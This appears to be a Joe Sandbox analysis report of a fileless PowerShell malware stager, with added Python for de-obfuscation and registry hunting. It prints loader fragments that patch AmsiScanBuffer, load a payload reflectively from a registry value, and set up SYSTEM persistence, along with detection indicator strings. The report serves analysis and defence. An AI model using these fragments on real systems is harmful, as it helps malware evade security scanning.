                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 43910672B8265087DF64EF29D400BBDB391FB54B98F5591269E8A077D8DB38D893C700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: f79a10e038a93774b6220fff7d8fb9d316ad75cb2df6f8cf6ee0ca6ed77e7b0b
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: DCD1A0726867808AEB60EF69D4803ED37A4F755B98F10221AEEC957B9ADB34C4D1C701
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 6f3609de3add40878d4193c969aa515023bea9eae821b963944786393ae262e5
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 1781D3707F364186FA54BB2D98813D962D0AB86B80F147127DE89477DADB3AC9C68700
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: e8f7cfa4712b6594a73d798c95a161230bff2712cf38c38252805b6215e78158
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 1651B0B22C27808AEB74AF29D14439877E8F355BA4F16611BDAD947BD5CB39C4E0CB01
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373
• Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
• Instruction ID: 3c45b49fb714593c3b2f0f15bd1743fbffba0b8266d19eb21a809d2044773dbc
• Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
• Instruction Fuzzy Hash: F951D4323D3A008AEB58EF2DE444BAC739DF344B98F159126DA9A47788DB78C8C1C701
APIs
Strings
Memory Dump Source
• Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
• Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
• Instruction ID: 0bc549c135c77d1bf49cfd518b783a8461a460bdae6cec86bd5d98798e4d066b
• Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
• Instruction Fuzzy Hash: FC618B72549BC485EB71EF19E4407DAB7A4F785B88F04621AEBD807B9ACB78C1D4CB00

Execution Graph

Execution Coverage:76.6%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:36.3%
Total number of Nodes:102
Total number of Limit Nodes:10

Node list (address, APIs called, successors), read as the path the stager takes from its entry point:
• 401798 -> 4017a5 FindResourceA -> 4017c5 SizeofResource -> 4017d8 -> 4017e4 LockResource, RegOpenKeyExW -> 40180b RegSetValueExW -> 401822. The failure branch of every node on this path goes to 40179d ExitProcess.
• 401822 -> 401868 GetProcessHeap, HeapAlloc, StrCpyW -> 401159 -> 40118e GetModuleHandleA -> 40119d GetProcAddress or 4011aa -> 401178 -> 401893 -> 4018c5 StrCatW, StrCatW, either directly or via 40189d StrCatW -> 40112f (2 API calls) -> 4018aa StrCatW, StrCatW.
• 4018c5 -> 4019e1 GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc -> 401000 CryptAcquireContextW -> 401028 CryptGenRandom, CryptReleaseContext -> 401044 -> 401a37 StrStrIW -> 401a9d, which cycles through 401a57 StrStrIW, StrNCatW, StrCatW -> 401b41 StrCatW, StrStrIW; 401adf StrCatW, StrCatW -> 401b18 StrCatW -> 401b27 StrCatW; and 401afb StrCatW, StrNCatW -> 401b18; it leaves through 401b71 (6 API calls) -> 4018d8.
• 4018d8 -> 401986 lstrlenW -> 40104b -> 401000 (3 API calls) -> 401076 -> 4019af -> 4019b3 StrStrIW -> 4019bf -> 4019c0 StrStrIW (self-loop) -> 4018e4. From there 401986 (6 API calls) is invoked 13 more times, from 4018e4, 4018f0, 4018fc, 401908, 401914, 401920, 40192c, 401938, 401944, 401950, 40195c, 401968 and 401974 -> 401827.
• 401827 -> 401674 SysAllocString, SysAllocString, CoInitializeEx -> 4016a7 CoInitializeSecurity -> 4016c8 CoCreateInstance (directly or via 4016bd) -> 4016ea VariantInit -> 40172d CoUninitialize -> 401785 SysFreeString, SysFreeString (also reached from the failure node 401782) -> 401835 -> 401674 (9 API calls) -> 401841 -> 40112f GetCurrentProcess, IsWow64Process -> 40114e -> 4011ad (7 API calls) -> 401209 CoInitializeSecurity -> 40122a CoCreateInstance (directly or via 40121f) -> 40124c VariantInit -> 40128f -> 4013dd VariantInit, VariantInit, VariantInit -> 401444 CoUninitialize -> 4014f3 (6 API calls, also reached from the failure node 4014f0) -> 401854.
• 401854 -> 40151a SysAllocString, SysAllocString, CoInitializeEx -> 40154d CoInitializeSecurity -> 40156e CoCreateInstance (directly or via 401563) -> 401590 VariantInit -> 4015d3 -> 401605 VariantInit or 40162b -> 401659 CoUninitialize -> 40165f SysFreeString, SysFreeString -> 40179d ExitProcess.

Callgraph

Control-flow Graph

APIs
• GetProcessHeap.KERNEL32(00000000,00008000,775C2EB0,00000000,00402238), ref: 004019F4
• HeapAlloc.KERNEL32(00000000), ref: 00401A01
• GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
• HeapAlloc.KERNEL32(00000000), ref: 00401A1C
  • Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
  • Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
  • Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
• StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
• StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
• StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
• StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
• StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
• StrCatW.SHLWAPI(?,?), ref: 00401AF2
• StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
• StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
• StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
• StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
• StrCatW.SHLWAPI(00000000,?), ref: 00401B75
• StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
• HeapFree.KERNEL32(00000000), ref: 00401B93
• GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
• RtlFreeHeap.NTDLL(00000000), ref: 00401B9C
Strings
Memory Dump Source
• Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_400000_powershell.jbxd
Similarity
• API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
• String ID: '+'$'+[Char]($)+'
• API String ID: 3510167801-3465596256
• Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
• Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
• Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
• Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64
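
The routine above (004019E1, with the literals '+[Char]( and )+' and a CryptGenRandom buffer) rewrites the PowerShell loader script into single-quoted fragments joined by [Char](N) casts, so the command line that reaches the PowerShell process no longer contains plain substrings such as $AmsiScanBufferPtr or [Reflection.Assembly]::Load(. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it evaluates that concatenation back to the plain string and then checks the result against the loader strings this report lists under 00401868. The obfuscated sample expression is constructed for the example; the decoder also accepts hexadecimal [Char](0xNN) arguments and PowerShell's '' quote escape, which is a generalisation beyond what the report shows.

```python
import re

# One token of a PowerShell expression of the form 'lit'+[Char](N)+'lit'+...
# Group 1: a single-quoted literal ('' inside it is an escaped quote).
# Group 2: the numeric argument of a [Char](...) cast, decimal or 0x-hex.
# The third alternative is the '+' operator with optional surrounding spaces.
_TOKEN = re.compile(
    r"'((?:[^']|'')*)'"
    r"|\[char\]\s*\(\s*(0x[0-9a-f]+|\d+)\s*\)"
    r"|\s*\+\s*",
    re.IGNORECASE,
)


def deobfuscate_char_concat(expr: str) -> str:
    """Evaluate a 'a'+[Char](98)+'c' style concatenation to the plain string.

    Raises ValueError on anything that is not one of the three token kinds, so
    constructs the decoder does not handle (variables, sub-expressions) are
    reported rather than silently skipped.
    """
    expr = expr.strip()
    out = []
    pos = 0
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if m is None:
            raise ValueError(f"unsupported token at offset {pos}: {expr[pos:pos + 20]!r}")
        literal, char_arg = m.group(1), m.group(2)
        if literal is not None:
            out.append(literal.replace("''", "'"))
        elif char_arg is not None:
            base = 16 if char_arg.lower().startswith("0x") else 10
            out.append(chr(int(char_arg, base)))
        pos = m.end()
    return "".join(out)


# Substrings of the loader script as listed in this report for 00401868.
INDICATORS = {
    "amsi_patch": "$AmsiScanBufferPtr",
    "delegate_call": "GetDelegateForFunctionPointer",
    "reflective_load": "[Reflection.Assembly]::Load(",
    "registry_payload": "Registry]::LocalMachine.OpenSubkey(",
}


def find_indicators(script: str) -> list:
    """Return the indicator names whose substring occurs in script (case-insensitive)."""
    lowered = script.lower()
    return [name for name, needle in INDICATORS.items() if needle.lower() in lowered]


# Constructed sample (not captured from the malware): the report's reflective-load
# fragment split into 'literal'+[Char](N)+'literal' pieces.
SAMPLE_OBFUSCATED = (
    "'[Refl'+[Char](101)+'ction.Assembly]::Load([Microsoft.Win32.Registry]::Local'"
    "+[Char](77)+'achine.OpenSubkey(''SOFTWARE'').GetValue(''$rbx-stager''))'"
)


def analyse(expr: str) -> dict:
    """Normalise expr and report the indicators found before and after normalisation."""
    plain = deobfuscate_char_concat(expr)
    return {
        "plain": plain,
        "before": find_indicators(expr),
        "after": find_indicators(plain),
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_OBFUSCATED)
    print(result["plain"])
    print("indicators before normalisation:", result["before"])
    print("indicators after normalisation:", result["after"])
```

Run against the raw command line the indicator list is empty; after normalisation the reflective load and the registry read are both visible, which is why command-line matching on this family has to normalise [Char]() concatenation first.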

Control-flow Graph

Basic blocks of 004011AD (address range and APIs), reconstructed from the graph's node list:
• 4011ad-401203: SysAllocString ×6, CoInitializeEx; on failure -> 4014f0 -> 4014f3-401519: SysFreeString ×6 (return).
• 401209-40121d: CoInitializeSecurity -> 40122a-401246: CoCreateInstance (directly or via 40121f-401224); on failure -> 4014e5 -> 4014e8-4014ee: CoUninitialize -> 4014f3-401519.
• 40124c-401291: VariantInit, followed by fourteen checked blocks without API calls (401297-4012ac, 4012b2-4012c5, 4012cb-4012dd, 4012e3-4012f0, 4012f6-401302, 401308-40131a, 401320-401336, 40133c-401352, 401358-40136a, 401370-401383, 401389-40139f, 4013a5-4013b3, 4013b9-4013c7, 4013cd-4013db). Each failure branch enters an unwind ladder (4014d4, 4014c6, 4014b8, 4014aa, 40149c, 40148e, 401480, 401472, 401464, 401456, each followed by one of 4014d7-4014e3, 4014c9-4014d2, 4014bb-4014c4, 4014ad-4014b6, 40149f-4014a8, 401491-40149a, 401483-40148c, 401475-40147e, 401467-401470, 401459-401462) that runs down to 4014e8-4014ee: CoUninitialize.
• 4013dd-401440: VariantInit ×3 -> 401444-401446 -> 401448-401454 -> unwind ladder.
APIs
• SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
• SysAllocString.OLEAUT32(00402234), ref: 004011CC
• SysAllocString.OLEAUT32(powershell), ref: 004011D8
• SysAllocString.OLEAUT32(?), ref: 004011E0
• SysAllocString.OLEAUT32(0040218C), ref: 004011EA
• SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
• CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
• CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
• VariantInit.OLEAUT32(?), ref: 00401250
• VariantInit.OLEAUT32(?), ref: 004013EA
• VariantInit.OLEAUT32(?), ref: 004013F0
• VariantInit.OLEAUT32(?), ref: 00401400
• CoUninitialize.COMBASE ref: 004014E8
• SysFreeString.OLEAUT32(?), ref: 004014FA
• SysFreeString.OLEAUT32(00000000), ref: 004014FD
• SysFreeString.OLEAUT32(?), ref: 00401502
• SysFreeString.OLEAUT32(?), ref: 00401507
• SysFreeString.OLEAUT32(?), ref: 0040150C
• SysFreeString.OLEAUT32(?), ref: 00401511
Strings
Memory Dump Source
• Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_400000_powershell.jbxd
Similarity
• API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
• String ID: $rbx-svc32$$rbx-svc64$SYSTEM$powershell
• API String ID: 3960698109-3701805373
• Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
• Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
• Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
• Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51
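
The stager mapped at 00400000 in process 56 (powershell.exe) leaves two artefacts that the execution graph above and the API lists for 004017A5 and 00401868 document: the embedded "EXE" resource (id 101) is written with RegSetValueExW as the value $rbx-stager under HKEY_LOCAL_MACHINE\SOFTWARE, opened with access mask 000F013F (KEY_ALL_ACCESS plus KEY_WOW64_64KEY, i.e. the 64-bit view rather than WOW6432Node), and the generated PowerShell script copies the bytes 0xb8,0x57,0,7,0x80,0xc2,0x18,0 over AmsiScanBuffer before calling [Reflection.Assembly]::Load on that registry value and into its EntryPoint. Assembly.Load(byte[]) only accepts a managed image, so a REG_BINARY value that parses as a PE with a CLI header is the thing to hunt for. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it flags registry values that hold a PE image, says whether the image is managed, and decodes an x86 mov eax,imm32 ; ret imm16 stub such as the AMSI patch. The registry snapshot and the PE headers are constructed for the example; on a live host the values would come from the hive, not from this dict.

```python
import struct

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # data-directory slot of the CLI (.NET) header
E_INVALIDARG = 0x80070057


def pe_info(blob: bytes):
    """Return None if blob is not a PE image, else its machine type and whether it is managed.

    Only the headers are parsed; that is enough to tell a stored executable
    apart from ordinary REG_BINARY data without loading it.
    """
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, _, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 2 or opt + opt_size > len(blob):
        return None
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == 0x10B:      # PE32: NumberOfRvaAndSizes at +92, directories at +96
        dirs = opt + 96
    elif magic == 0x20B:    # PE32+: NumberOfRvaAndSizes at +108, directories at +112
        dirs = opt + 112
    else:
        return None
    managed = False
    nrva = struct.unpack_from("<I", blob, dirs - 4)[0] if dirs <= len(blob) else 0
    if nrva > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR and dirs + 15 * 8 <= len(blob):
        cli_rva, cli_size = struct.unpack_from("<II", blob, dirs + IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR * 8)
        managed = cli_rva != 0 and cli_size != 0
    return {"machine": machine, "managed": managed}


def find_stored_executables(values: dict) -> list:
    """values maps 'HIVE\\path\\valuename' to raw REG_BINARY bytes; returns (name, managed) for PE-bearing ones."""
    hits = []
    for name, data in values.items():
        info = pe_info(data)
        if info is not None:
            hits.append((name, info["managed"]))
    return hits


def decode_ret_stub(patch: bytes):
    """Decode an x86 'mov eax, imm32 ; ret imm16' stub like the one written over AmsiScanBuffer.

    Returns the forced return value and the number of DWORD arguments the ret
    discards, or None if the bytes are not that two-instruction shape.
    """
    if len(patch) != 8 or patch[0] != 0xB8 or patch[5] != 0xC2:
        return None
    hresult = struct.unpack_from("<I", patch, 1)[0]
    stack_bytes = struct.unpack_from("<H", patch, 6)[0]
    return {"hresult": hresult, "args_popped": stack_bytes // 4}


def build_sample_pe(managed: bool) -> bytes:
    """Constructed test input: the smallest header layout pe_info accepts. Not a loadable image."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)          # i386, one section, PE32 optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                    # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                                      # NumberOfRvaAndSizes
    if managed:
        struct.pack_into("<II", opt, 96 + IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR * 8, 0x2008, 0x48)  # CLI header RVA/size
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed registry snapshot: one managed image stored the way the stager stores it,
# one native image, and two benign binary values. Paths and names are illustrative.
SAMPLE_VALUES = {
    "HKLM\\SOFTWARE\\$rbx-stager": build_sample_pe(managed=True),
    "HKLM\\SOFTWARE\\Example\\NativeBlob": build_sample_pe(managed=False),
    "HKLM\\SOFTWARE\\Example\\Settings": bytes(range(64)),
    "HKLM\\SOFTWARE\\Example\\Tiny": b"MZ",
}

# The eight bytes the loader script copies over AmsiScanBuffer (from the report's 00401868 strings).
AMSI_STUB = bytes([0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00])

if __name__ == "__main__":
    for name, managed in find_stored_executables(SAMPLE_VALUES):
        print(f"{name}: PE image in registry ({'managed' if managed else 'native'})")
    stub = decode_ret_stub(AMSI_STUB)
    print(f"patched AmsiScanBuffer returns 0x{stub['hresult']:08X} and pops {stub['args_popped']} arguments")
```

The decoded stub returns E_INVALIDARG and pops six DWORDs, which is the stdcall argument count of the x86 AmsiScanBuffer; a scan request that fails with an error is not treated as a detection, so the patched function lets any script through. For the hunt, read the 64-bit view of HKLM\SOFTWARE explicitly (a 32-bit collector would otherwise be redirected to WOW6432Node and miss the value).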

Control-flow Graph

Basic blocks of 004017A5 (address range and APIs), reconstructed from the graph's node list:
• 4017a5-4017bf: FindResourceA; on failure -> 401862-401867 (return).
• 4017c5-4017d2: SizeofResource -> 4017d8-4017e2 -> 4017e4-401809: LockResource, RegOpenKeyExW -> 40180b-401820: RegSetValueExW -> 401822-401858: call 401868, call 401674 ×2, call 40112f, call 4011ad -> 40185a-40185c: call 40151a. The failure branch of every block on this path goes to 401861 -> 401862-401867.
APIs
• FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
  (hModule NULL, resource id 101 of the custom type "EXE" in the stager's own image)
• SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
• LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
• LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
• RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
  (80000002 = HKEY_LOCAL_MACHINE; 000F013F = KEY_ALL_ACCESS | KEY_WOW64_64KEY, so this 32-bit stager opens the 64-bit view of HKLM\SOFTWARE instead of being redirected to WOW6432Node, which is the view a 64-bit PowerShell's [Microsoft.Win32.Registry]::LocalMachine.OpenSubkey reads)
• RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
  (dwType 3 = REG_BINARY; the loader script below reads this value back with GetValue)
  • Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
  • Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
  • Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
  • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
  • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
    (on x86 these eight bytes are mov eax,0x80070057 ; ret 0x18: the patched AmsiScanBuffer returns E_INVALIDARG after discarding its six stdcall arguments, so every scan fails without a detection)
  • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
  • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
  • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
  • Part of subcall function 00401674: SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
  • Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
  • Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
  • Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
  • Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
  • Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE
  • Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
  • Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
  • Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F
  • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
  • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
  • Part of subcall function 004011AD: SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
  • Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
  • Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
  • Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
  • Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
  • Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                                                                                                                                                            • Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                                                                                                                                                            • Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                                                                                                                                                            • Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                                                                                                                                                            • Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250
                                                                                                                                                            • Part of subcall function 0040151A: SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
                                                                                                                                                            • Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                                                                                                                                            • Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                                                                                                                                            • Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                                                                                                                                            • Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                                                                                                                                            • Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
                                                                                                                                                          • String ID: $rbx-stager$$rbx-svc32$$rbx-svc64$@Lw$EXE$SOFTWARE
                                                                                                                                                          • API String ID: 2402434814-2477386209
                                                                                                                                                          • Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                                                                                                                                                          • Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
                                                                                                                                                          • Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                                                                                                                                                          • Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

                                                                                                                                                          Control-flow Graph
                                                                                                                                                          control_flow_graph 191 401000-401026 CryptAcquireContextW 192 401044-40104a 191->192 193 401028-401041 CryptGenRandom CryptReleaseContext 191->193 193->192
                                                                                                                                                          APIs
                                                                                                                                                          • CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
